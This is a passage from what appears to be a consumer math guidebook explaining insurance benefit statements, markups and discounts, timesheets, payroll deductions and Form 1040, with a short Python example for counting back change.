insurance explanation of benefits. 


**PLEASE REFER TO THE BACK OF THIS DOCUMENT FOR ANY ADDITIONAL INFORMATION** 


Type of Service | Service Date | Code | Total Charges | PPO Discount | Not Covered | Covered Amount | Copay | Balance | Total Payment | See Remarks 
OP DRS VISIT | 06/26/2012 | 99213 | 107.00 | 58.25 | 48.75 | | | | | RR PH AG 08 
OP RADIO & LAB | 06/26/2012 | 93000 | 31.00 | | | 31.00 | | | | RR 12 AG 08 

RS Withholding: 
Total Billed Charges: $138.00 
Adjustment Due to Other Insurance: 
Total Paid: 


Patient Liability: $79.75 
(Patient Liability includes all applicable copayments, co-insurance, deductibles and non-covered items) 


PAYMENT SUMMARY SECTION 
Payment made to: 
Amount Paid: 
Check Number: 
PPO Discount Total: $58.25 
Base Deductible: 
Optional Benefit Deductible: $31.00 


Illustration by Wiley, Composition Services Graphics 


Figure 12-1: Health insurance explanation of benefits statement. 


What you may have noticed with health insurance explanations of 
benefits is that they aren’t necessarily easy to understand. Here’s 
what the fields in an explanation of benefits statement (EOB) mean 
(keep in mind that the EOB you receive may differ): 


Total charges: This reflects what the doctor charges for 
a service. 


PPO discount: This is the amount that the doctor agreed to let go 
of because his or her practice is part of a preferred provider 
organization (PPO) network that negotiated a lower fee for 
that service. (This is one reason why seeing a doctor who’s 
“in the network” is supposed to make your payments lower.) 


Not covered: Some services (or portions of a service) aren’t 
covered by your policy. In this statement, $48.75 of the $107 
visit wasn’t covered by insurance. You’re responsible for this 
amount. 


Covered: The insurance company will normally pay all $31 of 
the lab charges. 


Optional benefit deduction: Even though the $31 lab fee is 
covered, you haven’t met the deductible, so you’re paying 
the $31. 


Patient liability: You owe $79.75, and that’s the fact. It’s a 
combination of $48.75 for the visit and $31 for the lab work. 


Code: This is the procedure code; it’s the way the doctor’s 
office indicates what kind of service was provided. You'll 
never find out what these codes mean without the Internet — 
and it’s not on the back of the explanation. In the example, 
99213 stands for “15 minute visit with established patient.” 


Although every insurance company has its own explanation of 
benefits form, they all use terms similar to those in the preceding 
list. Understand those, and you’re that much closer to understanding 
your medical bills. Your real-life task is to tear out your hair, 
subtract what you can, and add up what’s left. You then wait for 
the doctor’s bill (which will reflect the insurance company’s payment) 
and pay the balance. For a specific rundown of what your 
EOB or billing statement shows, call your healthcare provider’s 
billing office. 


Choosing between high premiums or high deductibles 


Plans with lower deductibles are more expensive. “Cadillac plans,” 
for example, have generous benefits and lower deductibles; 
therefore, their premiums are higher. To keep premiums affordable, 
you may want to choose a plan with a higher deductible so that 
you can reduce the amount of money you pay in premiums to the 
insurance company. 


However, a high deductible/low premium plan isn’t always the best 
choice, depending on your circumstances. To determine whether 
a high deductible/low premium plan is better for you than a high 
premium/low deductible plan, you need to assess how likely you 
are to need medical care during a year and at what point the 
amount you save in deductible offsets the amount you pay in 
premiums. 


Say, for example, that you have to choose between a plan with 
a $2,000 deductible that costs $600 per month and a plan with a 
$5,000 deductible that costs $400 per month. The difference in 
premiums is $200 per month, and the difference in deductibles is 
$3,000. Your job is to save $3,000 to make up for the difference in 
deductibles. So divide the $3,000 by the $200 monthly premium 
savings to see that after 15 months, you’ll have enough in the bank 
to make up for any difference for a major illness. For minor things, 
such as doctor visits and lab procedures, don’t try. You probably 
won’t “meet the deductible” in either case. 


Life insurance 


Life insurance comes in many forms, mainly whole life (cash 
value) insurance, term life insurance, and annuities. When you’re 
employed by a large company, chances are that it may offer you 
free term life insurance equal to your annual salary, with the 
option of buying two or three times that amount at a low rate. 


Term life insurance insures your life for a fixed period of time, such 
as 5 years, 10 years, or 20 years. It’s fairly low cost. To determine 
your premium, simply multiply the number of units you want (say 
one hundred $1,000 units of 5-year term life insurance) by the 
annual premium per unit (say $1.00). In this example, the annual 
premium is $100. 


Sometimes, the insurance company simply advertises its total 
premium. For example, you may see “$250,000 coverage, 20 years, 
$177.50 annual,” and that pretty much tells you the whole story. 


Whole life insurance insures your life until you die, which (for 
five-year-olds) may be 90 years in the future. Even though your 
chances of dying increase each year (and the premium should 
increase as well), people prefer level-premium insurance. That is, 
the premiums stay the same over the entire life of the insurance 
contract. That means you pay a little more than necessary in the 
early years and a little less than necessary in the later years. Over 
time, an excess accumulates, and it’s known as the cash value of 
the policy. Again, to determine your premium, simply multiply the 
number of units you want (say ten $1,000 units of whole life insurance) 
by the annual premium per unit (say $6.00). In this example, 
the annual premium is $60. 


In the case of life insurance, you may buy additional coverage, 
called riders. These include spouse riders, mortgage payoff riders, 
and guaranteed insurability option riders. 


How do I insure thee? 
Let me count the ways 


If you look at all the insurances available, your head will spin, a condition not 
usually covered in health insurance policies. Here’s the lightning round of some 
forms of insurance other than those covered in this chapter. 


Private mortgage insurance (PMI) is also known as lenders mortgage 
insurance. It’s insurance against your defaulting on your home loan. The bank 
gets the benefit and you pay the premium. You can read more about this in 
Chapter 10. 


Unemployment insurance (UI) is paid by your employer. You get a benefit should 
you lose your job through no fault of your own. Note that UI is insurance, not a 
handout or any form of “welfare.” 


State disability insurance is insurance you pay through payroll deduction. It 
pays medical benefits for on-the-job injuries. 


Non-medical health insurance (if that's not too much of a contradiction) 
includes disability income insurance, long-term care insurance, and Medicare 
supplement coverage (Medigap). 


Pet insurance has grown in popularity. You can insure your pet against illness, 
accident, or death. 


Cruise insurance protects your investment in a cruise if, say, a hurricane or 
other travel disaster prevents you from going or prevents the cruise from taking 
place. For small trips, it's not so important, but for a $20,000 once-in-a-lifetime 
cruise, buying cruise insurance is probably an excellent idea. 


Chapter 13 
Taking Math to Work 


In This Chapter 


Calculating markups, discounts, and time and material costs 


Getting familiar with the different kinds of profit 
Filling out your timesheet and project accounting sheet 
Comparing what you make to what you take home 


How much math does your job require? For better or worse, 
most jobs don’t require much math. The exception is when 
you're a bank teller, an accounting clerk, a retail clerk, or a chief 
financial officer — and even then a lot of the math is “hidden” 
from you. It’s handled inside the cash register or by the proprietary 
accounting software your company uses. 


Even if you don’t do math on the job, knowing a bit about business 
math is very helpful. Business math encompasses everything from 
the high-flying items, such as complex calculations that should be 
left to experts, to the low-flying items that everyone who earns a 
paycheck should know. Guess which one I cover in this chapter? 
(Hint: Think of the topics as an incredibly brief course in Business 
Math Lite.) 


Setting Prices 


Profit comes from the difference between wholesale and retail 
prices. Wholesale prices are the prices that the business spends 
to buy items. Retail prices are the prices the business charges for 
items. For example, a business may buy a widget from a wholesaler 
for a price of $0.50 (the wholesale price) but turn around and sell 
the widget to customers for $2.00 (the retail price). 


Stores offer discounts (the difference between an item’s regular 
price and its sale price) in order to improve sales. Although the 
business charges less, it can make up that “lost” profit because 
people love sales. Discounting merchandise (the theory goes) will 
increase a store’s volume of sales. While they are in the store, 
customers might even buy items that aren’t on sale. 


These two concepts — setting retail prices and offering discounts — 
give rise to special calculations that you need to know about, 
whether you’re on the buying end of the transaction or the 
selling end. 


Managing markups 


A markup is the difference between the cost of goods and services 
and their selling price. You express the markup as a percentage of 
the wholesale price. Of course, the selling price is supposed to be 
high enough to create a profit. 


To calculate a product’s markup, you subtract the wholesale price 
from the selling price and then divide the result by the wholesale 
price. Suppose, for example, that the wholesale price for an item is 
$1.50 and the retail price is $2.50. You can use this formula to 
calculate the markup percentage: 


markup = (selling price - wholesale price) / wholesale price x 100 
markup = ($2.50 - $1.50) / $1.50 x 100 
markup = $1.00 / $1.50 x 100 
markup = 0.67 x 100 
markup = 67 

An item that costs $1.50 and sells for $2.50 has been marked 
up 67 percent. 


If the boss asks you to mark up a new item by 30 percent, use 
this formula: wholesale price x (1 + markup). In this example, the 
wholesale price is $1.50: 


selling price = wholesale price x (1 + markup) 
selling price = $1.50 x (1 + 0.30) 
selling price = $1.50 x 1.30 
selling price = $1.95 


When you mark an item with a wholesale price of $1.50 up 
by 30 percent, you sell it for $1.95. 


Figuring discounts 


Discounts lower the selling price of goods or services. 


The formula for figuring a discount is way simple. Just multiply the 
regular price by 1 minus the discount rate. Suppose, for example, 
that you want to discount an item that regularly costs $2.50 by 20 
percent. Use this formula: 


sale price = regular price x (1 - discount rate) 
sale price = $2.50 x (1 - 0.20) 
sale price = $2.50 x 0.80 
sale price = $2.00 


When you discount an item 20 percent, you sell it for 80 percent of 
its regular price. If you apply a 20 percent discount to an item with 
a regular retail price of $2.50, its sale price tag is $2.00. 


Quantity pricing produces lower prices, too, but it’s not a 
discount. See Chapter 5 for details. 


Predicting time and materials costs 


Time and materials (also known as labor and materials) is a 
standard phrase in some construction contracts. The customer 
agrees to pay labor rates for actual hours worked and for the 
actual costs of materials used. It’s open-ended, the opposite of 
a fixed-price contract. Automobile mechanics and plumbers do 
something similar. Your bill reflects materials used and labor 
hours expended. 


Some contracts guarantee a maximum price, which puts a limit 
on the total charges. At my company, we call it an NTE (“Not To 
Exceed”) price. 


The formula for calculating time and materials is very simple: 
You simply determine the price for the time (multiply the hours 
worked, or estimated to be worked, by the per-hour price) and 
then add in the price of parts and any applicable sales tax. 


Bumping into business numbers 


Various business numbers have names. If you know the names and the basic 
calculations to derive them, you'll be an expert in no time at all. (Or at least you'll 
appear to be an expert.) 


Income: Income (sometimes called revenue) is money your company takes in 
from selling goods and services. Selling an asset (like a truck) isn't income. 


Expenses: The term expenses refers to the money your company spends to 
make products and deliver services. Expenses are also called costs. Buying an 
asset (like a truck) isn't an expense. True, the purchase reduces the company’s 
cash, but it gets a truck. 


There are two kinds of costs, direct and indirect: 


Direct costs: These costs are tied directly to making a product or delivering a 
service. Direct costs are pretty easy to figure out. Each product your company 
makes (for example, a pair of denim pants) requires a certain dollar amount for 
materials (for example, denim, thread, zippers, and buttons) and labor. Direct 
costs make up the cost of goods sold. 


Indirect costs (also known as overhead): These costs aren't directly 
applicable to the product itself and include things like administration, personnel, 
and vehicles. Indirect costs make up operating expenses. 


Consider this automobile repair example. Here, the hours are 
worked out to the hundredth of an hour, and the labor rate is 
figured at three decimal places: 


total charges = (hours x hourly rate) + parts + tax 
total charges = (4.17 x $89.928) + $390.40 + $30.74 
total charges = $375.00 + $390.40 + $30.74 
total charges = $796.14 


By the way, the example total is exactly what it costs to replace a 
timing belt on a 2005 Honda Civic. 


Paying Attention to Profit 


Businesses are in business to make money — a concept even kids 
selling lemonade in their front yard understand. But whereas little 
Molly is happy to end up with a profit of a few extra dollars at the 
end of her lemonade-selling season (and gives it no more thought 
than what she can spend it on the next time Mom takes her to the 
store), businesses have to parse their profit a little more finely. 


Calculating profit margin 


The profit margin (or just plain margin) is the net income divided 
by the selling price (also called revenue). The net income for an 
item is the selling price less the wholesale price. To calculate the 
profit margin, use this formula: 


margin = (selling price - wholesale price) / selling price x 100 
margin = ($2.50 - $1.50) / $2.50 x 100 
margin = $1.00 / $2.50 x 100 
margin = 0.40 x 100 
margin = 40 


When you sell an item with a wholesale price of $1.50 for $2.50, the 
net income is $1.00. The profit margin is 40 percent. 


Determining gross profit 


Gross profit is sales less the cost of goods sold. In a service 
company, such as a landscaping service, the cost of goods sold 
includes the cost of labor to do the landscaping. Here’s the formula: 


gross profit = sales — cost of goods sold 


If that was the end of it, everything would be fine, but there’s more. 


Pre-tax profit 


Pre-tax profit (sometimes called operating profit) is what you get 
after you subtract all the operating expenses from the gross profit. 
Here’s the formula: 


pre-tax profit = gross profit — operating expenses 


The operating expenses include overhead. See the sidebar 
“Bumping into business numbers.” 


Net profit 


Net profit is the logical end to figuring the company’s bottom line. 
To get net profit, you subtract taxes and interest from pre-tax 
profit. 


net profit = pre-tax profit — taxes — interest 


Making Change 


No matter what your career, the realities of business are that you 
buy and sell. If you buy for cash, you receive change in return. 
If you sell for cash, you’re expected to give change. Either way, 
knowing how to make change accurately is a good idea. 


Making change is the technique of returning to a customer the 
difference in cash between the amount of a purchase and the 
money tendered. Change refers mainly to loose coins, but in reality 
it regularly includes paper money. 


The modern school of change-making uses a “no-math” technique. 
Basically, the cash register tells the clerk the charges. You give the 
clerk money, and he or she enters the “amount tendered” into the 
register. The cash register tells the clerk what change to give you. 
This method is usually fast, efficient, and accurate, but if the register 
isn’t working, you will sometimes see the clerk struggle. If you 
don’t know how to count change, you'll struggle as well, and it’s 
anybody’s guess whether you’re getting back what you’re owed. 
In addition, some “businesses” — church or school bake sales, for 
example — won’t have automated cash registers. 


What do you do? You count out change the way your grandmother 
did when she worked at Woolworth’s decades ago. Say your 
customer makes a $9.56 purchase and gives you a $10 bill. 


1. Leave the bill in plain sight on top of the cash drawer or 
cash box. 


2. Count the change out and give it back by “Speaking the 
change.” 


In this method, you describe what you’re giving back. Start 
with the smallest coins. 


“Your purchase was $9.56, out of $10.00. That’s $9.56,” 
“plus 4 cents (4 pennies) makes $9.60,” 

“plus 5 cents (a nickel) makes $9.65,” 

“plus 10 cents (a dime) makes $9.75,” 

“plus 25 cents (a quarter) makes $10.00.” 


No confusion, no error, and — if you’ll notice — no math! 
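The count-back routine above, written out as an added example that is not from the book: it assumes U.S. coin and bill denominations, works out the change largest denomination first, and then hands it back smallest first while tracking the running total, as in the $9.56 example. The function names are this example's own.

```python
from decimal import Decimal

# U.S. denominations in cents, largest first (an assumption of this example).
DENOMINATIONS = [
    (2000, "$20 bill"), (1000, "$10 bill"), (500, "$5 bill"), (100, "$1 bill"),
    (25, "quarter"), (10, "dime"), (5, "nickel"), (1, "penny"),
]


def to_cents(amount):
    """Convert a dollar amount given as a string such as "9.56" to whole cents."""
    cents = Decimal(amount) * 100
    if cents != cents.to_integral_value() or cents < 0:
        raise ValueError(f"not a valid cash amount: {amount!r}")
    return int(cents)


def count_back_change(purchase, tendered):
    """Return the change as (count, name, running_total_in_cents) steps.

    Steps are ordered smallest denomination first, so the running total
    climbs from the purchase price up to the amount tendered.
    """
    price, paid = to_cents(purchase), to_cents(tendered)
    if paid < price:
        raise ValueError("amount tendered is less than the purchase")

    # Break the change down using the largest pieces possible.
    remaining = paid - price
    pieces = []
    for value, name in DENOMINATIONS:
        count, remaining = divmod(remaining, value)
        if count:
            pieces.append((count, value, name))

    # Hand it back smallest first, keeping the running total.
    steps = []
    running = price
    for count, value, name in reversed(pieces):
        running += count * value
        steps.append((count, name, running))
    return steps


def speak_the_change(purchase, tendered):
    """Return the lines a clerk would say while counting the change back."""
    lines = [f"Your purchase was ${purchase}, out of ${tendered}."]
    for count, name, running in count_back_change(purchase, tendered):
        dollars, cents = divmod(running, 100)
        lines.append(f"plus {count} x {name} makes ${dollars}.{cents:02d}")
    return lines


if __name__ == "__main__":
    for line in speak_the_change("9.56", "10.00"):
        print(line)
```
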


Tracking Your Time 


Your time is the most precious commodity you have. On the job, 
you'll see many measurements of time. Management measures the 
hours of operation of machine tools (for maintenance) and the 
time to produce items (for productivity). If you’re a person on the 
job, you have two key elements of time to track: the hours you’ll be 
paid for working and the hours you expend on different projects. 


The timesheet 


Most people are paid by the hour. They’re called “non-exempt 
employees,” because they aren’t exempt from overtime laws (and 
that can be a very good thing). 


A timesheet is a common form used to record the time you spend 
doing your work. These forms come in many variations (and if 
you've worked at several different companies, you’ve undoubtedly 
seen several “flavors”). Figure 13-1 shows a simple timesheet. 


The key task is to record your time accurately and do a little bit of 
addition. 
Willow Valley Software: PROFESSIONAL SERVICES TIMESHEET 
NAME: Joe Writer    WEEK ENDING DATE: 04/12/2012 
Rows: Regular hours, Overtime hours, Vacation hours, Holiday hours, TOTAL 
TOTAL PAYROLL HOURS: 40 


Figure 13-1: A timesheet. 


To complete a simple timesheet, you generally have to record the 
hours you work each day in the appropriate box or field and then 
add them up to give the total hours each day, the total hours each 
week, and so on. Timesheet math is all about addition. For the 
timesheet shown in Figure 13-1, for example, follow these steps: 


1. Enter the number of hours you worked each day, separated 
into the given categories. 


2. Add up each day’s hours and place the total at the bottom 
of each column. 


3. Add across each row to total each category and place that 
number in the right-hand column. 


4. Enter the total for the week. 


The sum of each day’s hours should agree with the sum of 
the category hours. 


Note that this timesheet has room for overtime hours, but the 
company doesn’t generally authorize overtime. For more on 
overtime, see the section “Calculating your gross pay.” 


You may work in a place that has a time clock. You “clock in” when 
you arrive and “clock out” for lunch. Then you “clock in” after 
lunch and “clock out” when you leave. The way to figure out the 
morning and afternoon hours so that you know how many hours 
you worked in a day is to subtract times. If you clocked in at 8:00 a.m. 
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and left for lunch at 12:30, for example, you figure the difference: 
4.5 hours. Then, to figure your afternoon hours, you subtract your 
ending time (say, 5:30 p.m.) by the time you clocked back in from 
lunch (say, 1:30): 4 hours. Add your morning and afternoon hours 
together to get your total hours worked (8.5 hours). (Note: Many 
time clocks use military time, but the math is the same.) 


Heavens, no — Not project accounting! 


Heavens, yes! You always report time on the job for payroll 
purposes, but often you’re also required to do project accounting. 
Project accounting allows management to track which projects 
consume employee time. (This information is often necessary if 
projects are budgeted for a certain total number of hours to 
complete.) Figure 13-2 shows a project accounting entry sheet. 
Notice how similar it is to a timesheet. Basically, the task is the 
same; you just separate each day’s hours differently. Rather than 
categorizing hours as regular, overtime, and so on, you categorize 
them by project (the cryptic codes in the left-hand column in the 
figure, for example). Project accounting math is easy. Just record 
correctly and add. 


NAME: Joe Writer    PROJECT ACCOUNTING    Week Ending: 04/12/2012 
Columns: PROJECT, days of the week, TOTAL 
Projects: CIWMB Training, CIWMB Editing Services, CIWMB Assistance, HP - CASL, HP - XP 
Project totals shown: 20, 10, 10 
TOTAL PROJECT ACCOUNTING HOURS: 40 


Figure 13-2: A project accounting sheet. 


In this example, Joe Writer spent all of Monday, all of Tuesday, and 
half of Wednesday on CIWMB Training. The rest of his 40 hours 
worked were spread between two other projects. 


The Total column at the right sums up hours spent on each project. 
The Total row at the bottom sums up each day’s hours. The sum of 
each day’s hours should agree with the sum of the project hours. 


Accrual versus cash accounting 


The two major accounting methods are the cash method and the accrual method: 


Cash method 


In cash basis accounting, business activity at any given moment is determined 
by when cash actually flows into or out of a business. Cash basis accounting is 
simple. Basically, the business checkbook tells the whole story. When you pay for 
materials for your business with a check, that’s cash out the door. When you 
receive money for selling your product, that’s cash in the door. Small businesses 
often use cash basis accounting. 


The trouble is, cash basis accounting ignores timing. If you buy materials by credit 
card, you use them now, but don’t pay until later. If you “bill out” clients, you're 
selling to them (or working for them) now, but they don’t pay until later. These 
amounts don't show up immediately on the business ledger, even though they're 
vital to understanding business activity. 


That's where accrual basis accounting comes in.


Accrual method


In accrual basis accounting, the financial picture of a business at any given moment 
is based on when income and expenses are actually incurred. Accrual basis 
“realizes” expenses the moment you incur them, not when you pay for them. 
It “realizes” income the moment you sell a product or service, not when the 
customer pays. 


Here’s how it works: When you create an invoice, the accounts receivable (A/R) 
system generates a receivable, even though the customer may not pay for, say, 30 
days. When the payment comes in, the receivable “goes flat.” It's been satisfied 
by the payment. Accrual basis accounting used to be hard, but now some great 
accounting programs make it easy. 


Accrual basis accounting is thought to provide a more accurate reflection of 
business activity than cash basis accounting. Most businesses use accrual basis 
accounting. 


Parsing Your Paycheck


You know that your salary isn’t a gift. It’s the money you get for 
expending your time and energy on work. Your paycheck returns 
some of that energy to you. 


If you work 40 hours a week, for example, and are paid $20 per
hour, your gross pay is $800. If you work overtime, you can earn
even more gross pay. Of course, you don’t bring home everything
you earn. The taxman cometh, and his deductions, as well as other
deductions your employer implements (like health or life insurance
deductions), reduce your paycheck.


In the following sections, I explain how to figure your gross pay 
when you get paid regular time, overtime, and double time wages, 
and how to figure what you can expect to take home after deductions. 


Calculating your gross pay 


It’s a fact that most people work hard to earn their salaries. If 
you’re an hourly employee, here are the major classes of time 
expended on the job: 


Regular time (also known as straight time): Regular time is 
usually time paid on the first 40 hours you work in a week, at 
your base rate. 


Overtime: When you work more than 8 hours in a day or
more than 40 hours in a week, hours beyond the 8 hours or
40 hours are paid at the overtime rate, which is often “time
and a half.” What this means is that you earn your base rate
plus half your base rate for every hour of overtime you
work. Say your base pay is $20 per hour and you work 10
hours of overtime. Your hourly overtime rate is $30 per hour.


Double time: When you work more than 12 hours a day, 
hours beyond 12 hours are paid at the double time rate. (In 
Hollywood, this is called “Golden Time.”) With a base pay of 
$20 per hour, you make $40 per hour when you work double 
time. 


Sick time: Sick time is a company benefit. The company pays 
you straight time for the hours you were out sick. 


Vacation time: Like sick time, vacation time is a company benefit.
Many companies pay 80 hours per year in vacation pay.


Figuring your net pay: All about deductions


Net pay isn’t the full amount of your paycheck. It’s the amount you 
can spend. Whereas your gross pay (see the preceding section) tells 
you how much you’ve earned based on the hours you’ve worked 
or the salary you negotiated (if you’re an exempt employee), net 
pay is essentially what’s left over after deductions. 


Payroll deductions come in two flavors — mandated and voluntary. 
Your employer must withhold some money for federal income tax, 
Social Security and Medicare taxes, and other mandatory items, 
like state income taxes and state disability insurance, where 
applicable. You decide on voluntary deductions. They may include 
retirement plans and charitable contributions. 


Figure 13-3 shows typical payroll deductions. You probably 
recognize most of them: 


Federal income tax (FIT) is the withholding for federal 
income tax, based on the number of allowances you chose on 
Form W-4. 


Social Security is the retirement component of Social Security, 
designed to pay you a monthly income later in your life. 


Medicare is the Medicare component of Social Security,
designed to provide payments for healthcare later in your life.


State income tax (SIT) is the withholding for state income tax, 
based on the number of allowances you chose on Form W-4. 


State disability insurance (SDI) is a premium you pay, in case
you're injured on the job.


Other deductions are usually voluntary and might include deductions 
for a retirement plan, such as a 401(k), SIMPLE IRA, or SEP IRA; 
health savings account; or voluntary contributions to a charity. 


Deduction math is simple: Simply subtract your deductions from 
your gross pay. What’s left is your net pay. 


net pay = gross pay - deductions


Employee: George Spelvin (President), 552 Brock Road, Nevada City, CA 95959

Earnings and Hours               Qty     Rate     Current    YTD Amount
Hourly Regular Rate            32:00    41.00    1,312.00     17,056.00

Deductions From Gross                             Current    YTD Amount
SIMPLE IRA Employee                               -196.80     -2,558.40

Taxes                                             Current    YTD Amount
FIT Federal Withholding                           -168.00     -2,312.00
Social Security Employee                           -81.34     -1,057.42
Medicare Employee                                  -19.02       -247.26
CA - SIT Withholding                               -49.47       -643.11
CA - SDI Disability Employee                       -14.43       -171.87
                                                  -332.26     -4,431.66

Net Pay                                            782.94     10,065.94

Non-taxable Company Items                         Current    YTD Amount
SIMPLE IRA Company                                  39.36        511.68


Figure 13-3: Typical payroll deductions.


Using Form W-4 to change how much is withheld


IRS Form W-4 (official name: Employee’s Withholding Allowance 
Certificate) is a simple form that tells your employer how much 
money to withhold for federal income tax (see Figure 13-4). 


Form W-4 (2012), Employee's Withholding Allowance Certificate, Department of the Treasury, Internal Revenue Service. Fields shown: name, social security number, address, and filing status (Single; Married; Married, but withhold at higher Single rate); line 5, total number of allowances you are claiming; line 6, additional amount, if any, you want withheld from each paycheck; line 7, claim of exemption from withholding; employee's signature and date.


Figure 13-4: IRS Form W-4.


You don’t tell your company how much money to withhold. (It has
tables and computers to do that task.) Instead, you use a Form W-4
to tell your company how many allowances to select. The
higher the number of allowances, the less federal income tax your
employer withholds. Less withheld means you have more money
to spend.


The number you enter is usually based on the total number of 
dependents in your household. Generally, you declare yourself, 
your spouse, and your children. There are variations and other 
tweaks as well. If your mother lives with you, for example, you can 
usually claim her, too. If you declare yourself, your spouse, your 
two minor kids, and your mom who lives with you, you have 5 
allowances. 


You complete Form W-4 when you're hired for a job. But you can 
fill out a new one any time. If you have a new baby, for example, 
you’d want to increase your number of allowances. If you think 
you'll take a hit at tax time, you can decrease your number of 
allowances so that more taxes are withheld each paycheck. 


The objective is generally to free as much cash as possible now. 
There’s usually no point in over-withholding. If you'd like to do a
withholding calculation using the W-4 worksheet, you can
download a W-4 form from http://www.irs.gov.


Chapter 14


How Taxing! (Almost) Understanding the Government


In This Chapter
Comprehending income tax
Taking on the terrifying Form 1040
Managing the many kinds of taxes
Reviewing government fees


It takes money to run the government, and money comes to it in
the form of taxes. A tax is a financial charge that the government
imposes on a taxpayer, who may be an individual (you) or a
corporation (your company).


The great Supreme Court Justice Oliver Wendell Holmes said, 
“Taxes are the price we pay for a civilized society.” That makes 
sense, because government takes care of national defense, police 
services, firefighting, scientific research, and much, much more. 
At their best, taxes you pay return value in services to you. At 
their worst, taxes are a little like what Dr. Waldman says in the 
1931 movie, Frankenstein: “You have created a monster, and it will 
destroy you!” 


In this chapter, you see some top-level information about taxes — 
what they are, how they work, and how to calculate them. 


Illuminating Income Taxes


An income tax is a tax on personal or corporate income. Chances 
are, you pay United States federal income tax, and many states (41 
out of 50 at last count) levy income taxes, too. 


Fortunately, income tax is easier to understand and calculate than 
many people think. You need only to know some terms and do 
simple arithmetic. 


Emperor Wang Mang of China imposed an income tax in 10 AD, and 
Henry II used an income tax to raise money for the Third Crusade. 
These days, about 123 countries have a tax on income. 


Taming Form 1040 


The basic income tax form in the United States is the Internal 
Revenue Service Form 1040, U.S. Individual Income Tax Return (see 
Figure 14-1). At the core, the 1040 is simple. You figure out your 
total income, make a few subtractions, and pay a tax on the 
difference. 


Form 1040 (2011), U.S. Individual Income Tax Return, Department of the Treasury, Internal Revenue Service. The top portion shown covers the name, address, and social security number fields; Filing Status (1 Single; 2 Married filing jointly; 3 Married filing separately; 4 Head of household; 5 Qualifying widow(er) with dependent child); Exemptions (6a Yourself; 6b Spouse; 6c Dependents; total number of exemptions claimed); and the start of Income (7 Wages, salaries, tips, etc.; 8a Taxable interest; tax-exempt interest).


Figure 14-1: The top portion of Form 1040.


This section is about filling out a tax form. I’m not an accountant
or an attorney, so for tax advice, you want to consult a tax
professional.


Form 1040 has several sections, each of which contains a group of
lines that you fill in or ignore, depending on what applies to you. In
the next sections, I take you through the form, explaining the math
along the way.


After putting in your name, address, other identifying information 
and indicating your filing status, you proceed through a series of 
sections. 


The following sections are based on the 2011 1040 Form. So stay 
alert! In addition to the form changing every year, the standard 
deduction amount, exemption amount, and tax rates change every 
year, too. To avoid trouble, make sure you use the current form 
and the correct amounts. 


The Exemptions section 


Exemptions lower your taxable income (and therefore lower your 
tax). In the Exemptions section, you claim yourself, your spouse (if 
applicable), and your dependents if you have them, and add up all 
the people you claimed. For example, if you check boxes for 
yourself and your spouse, and list the names of your three kids, 
you have 5 exemptions. 


The Income section 


In this section, you tally up all the ways you brought in money to 
get your total income. Income has many sources, including your 
wages, interest, dividends, and alimony. This is also where 
self-employment income and farm income go. Even unemployment 
compensation (if you can believe it!) is subject to income tax. But 
don’t worry (yet). By contrast, taxable income is income you will 
pay taxes on, which is going to be lower than total income. Most 
people get their income figure from Form W-2, which their company 
gives them at the end of the year. 


The Adjusted Gross Income section


Adjusted gross income (AGI) is just what it says: income adjusted
by adjustments. In this section, you record any adjustments you’re
entitled to. Adjustments reduce your AGI (which will reduce your
taxable income). They include educator expenses (for teachers,
of course), moving expenses, interest on student loans, and IRA
contributions. You may have no adjustments, but if you do, add
them up.


To calculate adjusted gross income, you do a simple subtraction: 


adjusted gross income = income - adjustments


The Taxes and Credits section 


This is where you enter deductions and exemptions and calculate 
your tax. 


A deduction is an expense you're allowed to use to reduce AGI. 
That’s good, because if you lower your AGI, the result will be a 
lower taxable income. There are many kinds of deductions, and the 
1040 allows you to choose between a standard deduction (in 2011, 
$5,800 for a single person) or a larger amount, if you “itemize” 
deductions on Form 1040 Schedule A. An exemption isn’t a 
deduction, but it has the same function — lowering your AGI. 


Here are some important parts of the Taxes and Credits sections: 


Entering your deductions: Enter the standard deduction or
the itemized deductions from Schedule A.


Tallying up your exemptions: For every exemption you
entered on page 1 (yourself, spouse, and dependents), you
multiply by $3,700 (in 2011).


Finding your taxable income: Taxable income is the income 
you'll pay taxes on. To figure it, you subtract your deductions 
and your exemptions from your AGI: 


taxable income = AGI - itemized deductions - exemption amount


Indicating your tax and tax credits: Tax is the tax you owe. 
You can get the number by doing a tax rate calculation, but 
most people simply go to the tax tables in the Form 1040 
instructions. You enter the tax on the Tax line (which on 2011 
forms was Line 44). Below that line are about eight other “tax 
credit” lines, where you might enter (for example) a residential 
energy credit. 


You can be sure that this is a simple example. The 1040 has 
many other tax and credit lines. Just add tax credits together 
and subtract them from your tax. 


No negative numbers exist in Government Land! If your tax is 
$1,000 and your credits are $2,000, you enter 0! 


Marginal rate


The marginal tax rate is the rate on the last dollar of income you earned. Despite 
the murky name and equally murky definition, it's not a hard number to understand. 
The government taxes the first dollars you make in a year at a low rate. Then when 
you earn a few more, those additional dollars get taxed at a higher rate. By the end 
of the year, you may have earned enough for the last dollars to be taxed at an even 
higher rate. 


The marginal rates are known as tax brackets. You may have heard a friend say,
“I'm in the 28 percent tax bracket.” In the U.S., the brackets are 10, 15, 25, 28, 33,
and 35 percent. To see the current tax brackets and the income each applies to,
visit http://www.irs.gov.


To determine your marginal rate, you can use the tax tables. Or use a marginal 
rate calculator. You can find both simple and complex calculators on the Internet. 
You enter wages, filing status, number of dependents, and the amount of itemized 
deductions. The calculator tells you your marginal tax rate. To see one of them, visit 
http://www.dinkytown.net/java/TaxMargin.html.


The Other Taxes section 


There’s always room for more taxes. Among other things, this
section asks you to enter self-employment tax (if you’re in
business for yourself). Just add up the lines and add the total to
your tax. You put this in a line called “Total Tax.” At last!


The Payments section 


The amount of your federal withholding (from the Form W-2 your 
company gave you) goes in this section. There are a couple of 
other possible credits (such as a first-time homebuyer credit), too. 


The Refund and Amount You Owe sections


If your withholding is larger than your total tax, you are going to 
get a refund. If it’s smaller, you owe Uncle Sam some money. Just 
subtract. 


Deciding whether to itemize 


Should you itemize deductions? For many taxpayers, it’s an annual 
question. The short answer is, if you own a home with a mortgage, 
probably yes. If you don’t, you'll have to dig deeper to determine 
whether itemizing is the way to go. Here’s why: If you don’t 
itemize, you’re entitled to a standard deduction. In 2011, that
deduction was $5,800 for a single person and $11,600 for a married 
couple filing jointly. 


The main reason to itemize is when you can get more than that 
standard deduction because you have more than $5,800 or $11,600 
worth of deductions. The reason so many homeowners opt to itemize
is because interest paid on a mortgage ends up being a big
deduction that either pushes them over the standard deduction 
amount or gets them close enough to it that, with a few other 
deductions, they end up exceeding the standard deduction. 


When you’re making the “itemize or not” decision, your math task 
